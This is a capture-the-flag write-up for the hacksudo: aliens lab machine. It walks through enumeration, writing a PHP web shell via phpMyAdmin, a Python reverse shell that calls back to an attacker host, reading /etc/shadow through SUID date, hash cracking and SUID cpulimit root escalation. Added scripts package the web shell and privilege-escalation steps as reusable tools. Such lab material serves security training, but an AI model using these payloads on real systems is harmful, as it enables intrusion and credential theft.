This is my write-up for hacksudo: aliens. The CTF machine is available for download here; Vishal Waghmare is its creator.
Let's begin with a full-port nmap scan to discover open ports. The target IP in my lab is 192.168.9.71. Command: sudo nmap -p- 192.168.9.71
Targeted nmap scan (version detection plus default scripts) against ports 22, 80 and 9000. Command used: sudo nmap -sV -sC -p22,80,9000 192.168.9.71
Directory enumeration on port 80 using gobuster:
gobuster dir --url http://192.168.9.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25
Let's download the mysql.bak file. It contains database credentials.
The earlier nmap scan showed phpMyAdmin running on port 9000, and the credentials from mysql.bak let me log in.
Navigating to mysql -> users shows a few users and their password hashes.
So the available users are root, phpmyadmin, shovon, hacksudo and vishal.
I spent a good amount of time trying to get shell access on this box through the phpMyAdmin web console, then found a good article here. Following the article, I took the steps below.
1. Clicked on New and created a new database. I named it shell_it.
2. Clicked on shell_it and opened the SQL tab, since we need an SQL query to write the file.
3. Clicked on Go to execute the query. The message shows that the query succeeded.
4. Visited the URL http://192.168.9.71/my_shell.php?cmd=id;hostname. We have command execution on the box.
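As an added example (not part of the original write-up), the steps above as the SQL you would paste into the phpMyAdmin SQL tab, wrapped in a small shell helper, together with the two checks worth running first and a curl check that the shell landed. The web root /var/www/html and the one-line shell body are assumptions; the write-up only shows the resulting URL http://192.168.9.71/my_shell.php?cmd=....

```shell
#!/bin/sh
# Added example, not from the original write-up. Generates the SQL that drops a
# one-line PHP web shell through phpMyAdmin and a curl check that it landed.
# Assumptions (not stated in the write-up): web root /var/www/html and the
# shell body <?php system($_GET["cmd"]); ?>.

# Queries to run first: INTO OUTFILE needs the FILE privilege, and
# secure_file_priv must be empty (unrestricted) or point at the web root.
precheck_sql() {
    cat <<'EOF'
SHOW GRANTS FOR CURRENT_USER();
SHOW VARIABLES LIKE 'secure_file_priv';
EOF
}

# Build the OUTFILE query. The PHP uses double quotes around cmd so the
# single-quoted SQL literal needs no escaping. MySQL refuses to overwrite an
# existing file, so the name must not already exist in the web root.
webshell_sql() {
    webroot=$1
    name=${2:-my_shell.php}
    printf "SELECT '<?php system(\$_GET[\"cmd\"]); ?>' INTO OUTFILE '%s/%s';\n" "$webroot" "$name"
}

# Confirm execution the same way the write-up does (?cmd=id;hostname), letting
# curl URL-encode the command.
check_rce() {
    url=$1   # e.g. http://192.168.9.71/my_shell.php
    curl -s -G --data-urlencode "cmd=id;hostname" "$url"
}

# Usage (prints the SQL to paste into phpMyAdmin, then checks the shell):
#   precheck_sql
#   webshell_sql /var/www/html
#   check_rce http://192.168.9.71/my_shell.php
```

If SHOW VARIABLES returns NULL for secure_file_priv, INTO OUTFILE is disabled entirely and this route is closed regardless of privileges; if it returns a directory, the shell can only be written there.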
Time to get a reverse shell.
1. Found the python reverse shell payload here. The box has python3 installed. I used the payload below, URL-encoded:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
URL-encoded form as sent in the cmd parameter:
%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%39%2e%33%22%2c%34%34%35%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27
2. Started a netcat listener on port 443 on the Kali machine.
3. Reverse shell received on port 443.
We don't have enough permissions as the www-data user. Basic enumeration with find for SUID binaries shows that date has the SUID bit set.
Privilege escalation to user hacksudo.
According to GTFOBins, a SUID date binary can be used to read files.
I tried to read /etc/shadow and got the hash for the user hacksudo, then cracked it with john.
1. Created a variable my_shadow with the value "/etc/shadow".
2. Used /usr/bin/date -f $my_shadow to read the hashes.
3. Copied the hacksudo hash into a file and cracked it with john using the rockyou.txt wordlist.
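As an added example (not from the original write-up), the post-exploitation steps above as reusable shell functions: list SUID binaries, flag the ones whose names appear on a short GTFOBins-style watch list, pull a file through the SUID date binary by harvesting its "invalid date" error lines, and cut one user's shadow entry into the form john wants. The watch list is a small hand-picked subset I chose for illustration, not the full GTFOBins catalogue; the date trick relies on GNU coreutils date.

```shell
#!/bin/sh
# Added example, not from the original write-up. Reusable versions of the
# privilege-escalation enumeration used above. The watch list in
# flag_interesting is an illustrative subset, not the full GTFOBins list.

# All SUID files on the box (the find enumeration the write-up refers to).
suid_binaries() {
    find / -perm -4000 -type f 2>/dev/null
}

# Given paths on stdin, print the ones whose basename is on the watch list.
# date and cpulimit are the two that matter on this box.
flag_interesting() {
    watch=' date cpulimit find vim nmap python3 bash cp mv tar '
    while IFS= read -r path; do
        case "$watch" in
            *" $(basename "$path") "*) printf '%s\n' "$path" ;;
        esac
    done
}

# Read a file via a SUID date: every line that is not a valid date comes back
# in the error message "date: invalid date '...'", so strip that wrapper.
# LC_ALL=C keeps the quotes ASCII regardless of the box's locale.
read_via_date() {
    LC_ALL=C ${DATE_BIN:-date} -f "$1" 2>&1 | sed -n 's/^date: invalid date .\(.*\).$/\1/p'
}

# Pick one user's shadow entry and reduce it to user:hash for john.
shadow_line() {
    user=$1
    grep "^$user:" | cut -d: -f1,2
}

# Usage:
#   suid_binaries | flag_interesting
#   read_via_date /etc/shadow | shadow_line hacksudo > hash.txt
#   john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

The date technique only leaks lines that fail to parse as dates; a line that happens to be a valid date (a bare timestamp in a log, say) is printed normally on stdout instead, so for arbitrary files compare the line count against wc -l before trusting the output.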
Login as user hacksudo.
User Flag
Reading .bash_history as part of basic enumeration shows cpulimit being run with /bin/bash -p as its argument. find also shows that cpulimit has the SUID bit set. Let's use it to escalate privileges to root.
There is another way to get the hacksudo user on this box. Since we discovered the users root, phpmyadmin, shovon, hacksudo and vishal through the phpMyAdmin console, I ran hydra in the background to brute-force SSH logins for those users and got a hit for hacksudo.
Tools Used:
- nmap
- gobuster
- hydra
- curl
- john